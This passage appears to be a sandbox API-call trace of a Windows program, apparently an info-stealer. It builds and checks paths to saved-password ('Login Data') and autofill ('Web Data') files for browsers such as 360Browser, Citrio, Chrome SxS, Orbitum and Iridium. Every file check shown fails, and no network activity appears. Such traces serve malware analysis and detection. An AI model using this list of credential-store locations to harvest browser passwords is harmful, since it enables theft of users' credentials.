(pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Login Data") returned 0 [0234.935] GetProcessHeap () returned 0x740000 [0234.935] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.935] GetProcessHeap () returned 0x740000 [0234.935] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.936] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.937] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 67 [0234.937] GetProcessHeap () returned 0x740000 [0234.937] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8a) returned 0x75bdd8 [0234.937] GetProcessHeap () returned 0x740000 [0234.938] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.938] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.939] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCoowon\\Coowon\\Default\\Login Data") returned 0 [0234.939] GetProcessHeap () returned 0x740000 [0234.939] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0234.939] GetProcessHeap () returned 0x740000 [0234.939] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0234.940] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.941] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 80 [0234.941] GetProcessHeap () returned 0x740000 [0234.941] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa4) returned 0x75bdf0 [0234.941] GetProcessHeap () returned 0x740000 [0234.941] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.942] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Login Data") returned 0 [0234.942] GetProcessHeap () returned 0x740000 [0234.942] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0234.942] GetProcessHeap () returned 0x740000 [0234.942] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0234.943] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.943] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 78 [0234.943] GetProcessHeap () returned 0x740000 [0234.944] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa0) returned 0x74b4c0 [0234.944] GetProcessHeap () returned 0x740000 [0234.944] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.944] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.945] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Mustang Browser\\User Data\\Default\\Web Data") returned 0 [0234.945] GetProcessHeap () returned 0x740000 [0234.945] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x74b4c0 | out: hHeap=0x740000) returned 1 [0234.945] GetProcessHeap () returned 0x740000 [0234.945] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0234.946] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.947] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 61 [0234.947] GetProcessHeap () returned 0x740000 [0234.947] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75bdc8 [0234.947] GetProcessHeap () returned 0x740000 [0234.948] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.949] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Login Data") returned 0 [0234.949] GetProcessHeap () returned 0x740000 [0234.949] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0234.949] GetProcessHeap () returned 0x740000 [0234.949] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0234.950] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0234.951] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 69 [0234.951] GetProcessHeap () returned 0x740000 [0234.951] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x8e) returned 0x75bdd8 [0234.951] GetProcessHeap () returned 0x740000 [0234.952] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0234.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0234.952] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalMustang Browser\\Default\\Login Data") returned 0 [0234.953] GetProcessHeap () returned 0x740000 [0234.953] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0235.040] GetProcessHeap () returned 0x740000 [0235.040] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0235.041] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.042] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 83 [0235.042] GetProcessHeap () returned 0x740000 [0235.042] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xaa) returned 0x75bdf0 [0235.042] GetProcessHeap () returned 0x740000 [0235.043] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.044] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.044] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Login Data") returned 0 [0235.045] GetProcessHeap () returned 0x740000 [0235.045] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0235.045] GetProcessHeap () returned 0x740000 [0235.045] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0235.046] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.047] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 81 [0235.047] GetProcessHeap () returned 0x740000 [0235.047] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa6) returned 0x75bde8 [0235.047] GetProcessHeap () returned 0x740000 [0235.048] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.049] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\360Browser\\Browser\\User Data\\Default\\Web Data") returned 0 [0235.050] GetProcessHeap () returned 0x740000 [0235.050] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0235.050] GetProcessHeap () returned 0x740000 [0235.050] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0235.051] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.052] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 64 [0235.052] GetProcessHeap () returned 0x740000 [0235.052] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x84) returned 0x75bdc8 [0235.052] GetProcessHeap () returned 0x740000 [0235.052] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.053] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.053] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Login Data") returned 0 [0235.053] GetProcessHeap () returned 0x740000 [0235.054] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0235.054] GetProcessHeap () returned 0x740000 [0235.054] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0235.055] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.055] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 72 [0235.055] GetProcessHeap () returned 0x740000 [0235.056] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x94) returned 0x75bdd8 [0235.056] GetProcessHeap () returned 0x740000 [0235.056] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.058] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local360Browser\\Browser\\Default\\Login Data") returned 0 [0235.058] GetProcessHeap () returned 0x740000 [0235.058] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0235.058] GetProcessHeap () returned 0x740000 [0235.058] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0235.059] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.060] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 85 [0235.060] GetProcessHeap () returned 0x740000 [0235.061] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xae) returned 0x75bdf0 [0235.061] GetProcessHeap () returned 0x740000 [0235.061] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.062] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.062] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Login Data") returned 0 [0235.063] GetProcessHeap () returned 0x740000 [0235.063] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0235.063] GetProcessHeap () returned 0x740000 [0235.063] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0235.064] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.065] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 83 [0235.065] GetProcessHeap () returned 0x740000 [0235.065] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xaa) returned 0x75bde8 [0235.065] GetProcessHeap () returned 0x740000 [0235.065] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.066] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.066] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\Default\\Web Data") returned 0 [0235.066] GetProcessHeap () returned 0x740000 [0235.067] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0235.067] GetProcessHeap () returned 0x740000 [0235.067] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0235.068] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.069] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 66 [0235.069] GetProcessHeap () returned 0x740000 [0235.069] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x88) returned 0x75bdc8 [0235.069] GetProcessHeap () returned 0x740000 [0235.069] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.070] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.071] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Login Data") returned 0 [0235.071] GetProcessHeap () returned 0x740000 [0235.071] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0235.071] GetProcessHeap () returned 0x740000 [0235.071] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0235.072] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.074] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 74 [0235.074] GetProcessHeap () returned 0x740000 [0235.074] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x98) returned 0x75bdd8 [0235.074] GetProcessHeap () returned 0x740000 [0235.074] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.075] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalCatalinaGroup\\Citrio\\Default\\Login Data") returned 0 [0235.076] GetProcessHeap () returned 0x740000 [0235.076] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0235.218] GetProcessHeap () returned 0x740000 [0235.218] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0235.219] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.220] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 82 [0235.220] GetProcessHeap () returned 0x740000 [0235.220] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa8) returned 0x75bdf0 [0235.220] GetProcessHeap () returned 0x740000 [0235.221] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.222] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Login Data") returned 0 [0235.222] GetProcessHeap () returned 0x740000 [0235.222] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0235.223] GetProcessHeap () returned 0x740000 [0235.223] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0235.223] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.224] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 80 [0235.224] GetProcessHeap () returned 0x740000 [0235.224] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xa4) returned 0x75bde8 [0235.225] GetProcessHeap () returned 0x740000 [0235.225] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.226] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome SxS\\User Data\\Default\\Web Data") returned 0 [0235.226] GetProcessHeap () returned 0x740000 [0235.227] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0235.227] GetProcessHeap () returned 0x740000 [0235.227] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0235.228] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.229] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 63 [0235.229] GetProcessHeap () returned 0x740000 [0235.229] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x82) returned 0x75bdc8 [0235.229] GetProcessHeap () returned 0x740000 [0235.230] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.231] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Login Data") returned 0 [0235.231] GetProcessHeap () returned 0x740000 [0235.232] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0235.232] GetProcessHeap () returned 0x740000 [0235.232] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0235.233] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.234] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 71 [0235.235] GetProcessHeap () returned 0x740000 [0235.235] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x92) returned 0x75bdd8 [0235.235] GetProcessHeap () returned 0x740000 [0235.235] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.236] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.237] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalGoogle\\Chrome SxS\\Default\\Login Data") returned 0 [0235.237] GetProcessHeap () returned 0x740000 [0235.237] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0235.237] GetProcessHeap () returned 0x740000 [0235.237] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0235.239] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.240] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 72 [0235.240] GetProcessHeap () returned 0x740000 [0235.240] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x94) returned 0x75bdf0 [0235.240] GetProcessHeap () returned 0x740000 [0235.241] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.242] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.242] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Login Data") returned 0 [0235.243] GetProcessHeap () returned 0x740000 [0235.243] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0235.243] GetProcessHeap () returned 0x740000 [0235.243] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0235.244] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.245] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 70 [0235.245] GetProcessHeap () returned 0x740000 [0235.245] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75bde8 [0235.245] GetProcessHeap () returned 0x740000 [0235.246] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.246] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.247] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Orbitum\\User Data\\Default\\Web Data") returned 0 [0235.247] GetProcessHeap () returned 0x740000 [0235.248] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0235.248] GetProcessHeap () returned 0x740000 [0235.248] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0235.249] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.250] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 53 [0235.250] GetProcessHeap () returned 0x740000 [0235.250] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75bdc8 [0235.250] GetProcessHeap () returned 0x740000 [0235.250] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.251] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.251] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Login Data") returned 0 [0235.252] GetProcessHeap () returned 0x740000 [0235.252] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0235.252] GetProcessHeap () returned 0x740000 [0235.252] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0235.253] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.254] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 61 [0235.254] GetProcessHeap () returned 0x740000 [0235.254] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75bdd8 [0235.254] GetProcessHeap () returned 0x740000 [0235.255] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.379] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.380] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalOrbitum\\Default\\Login Data") returned 0 [0235.380] GetProcessHeap () returned 0x740000 [0235.380] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdd8 | out: hHeap=0x740000) returned 1 [0235.380] GetProcessHeap () returned 0x740000 [0235.380] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f84) returned 0x757e60 [0235.381] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.382] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0x19f778 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 72 [0235.382] GetProcessHeap () returned 0x740000 [0235.382] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x94) returned 0x75bdf0 [0235.382] GetProcessHeap () returned 0x740000 [0235.382] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.383] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Login Data") returned 0 [0235.384] GetProcessHeap () returned 0x740000 [0235.384] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0235.384] GetProcessHeap () returned 0x740000 [0235.384] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f80) returned 0x757e60 [0235.385] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.386] wvsprintfW (in: param_1=0x757e60, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 70 [0235.386] GetProcessHeap () returned 0x740000 [0235.386] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x90) returned 0x75bde8 [0235.386] GetProcessHeap () returned 0x740000 [0235.386] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.387] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.388] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Iridium\\User Data\\Default\\Web Data") returned 0 [0235.388] GetProcessHeap () returned 0x740000 [0235.389] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bde8 | out: hHeap=0x740000) returned 1 [0235.389] GetProcessHeap () returned 0x740000 [0235.389] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f5e) returned 0x757e60 [0235.390] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.391] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 53 [0235.391] GetProcessHeap () returned 0x740000 [0235.391] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x6e) returned 0x75bdc8 [0235.391] GetProcessHeap () returned 0x740000 [0235.392] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.393] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0235.393] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Login Data") returned 0 [0235.394] GetProcessHeap () returned 0x740000 [0235.394] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdc8 | out: hHeap=0x740000) returned 1 [0235.394] GetProcessHeap () returned 0x740000 [0235.394] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3f6e) returned 0x757e60 [0235.395] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0235.396] wvsprintfW (in: param_1=0x757e60, param_2="%s%s\\Default\\Login Data", arglist=0x19f774 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\LocalIridium\\Default\\Login Data") returned 61 [0235.396] GetProcessHeap () returned 0x740000 [0235.396] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7e) returned 0x75bdd8 [0235.396] GetProcessHeap () returned 0x740000 [0235.396] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x757e60 | out: hHeap=0x740000) returned 1 [0235.397] 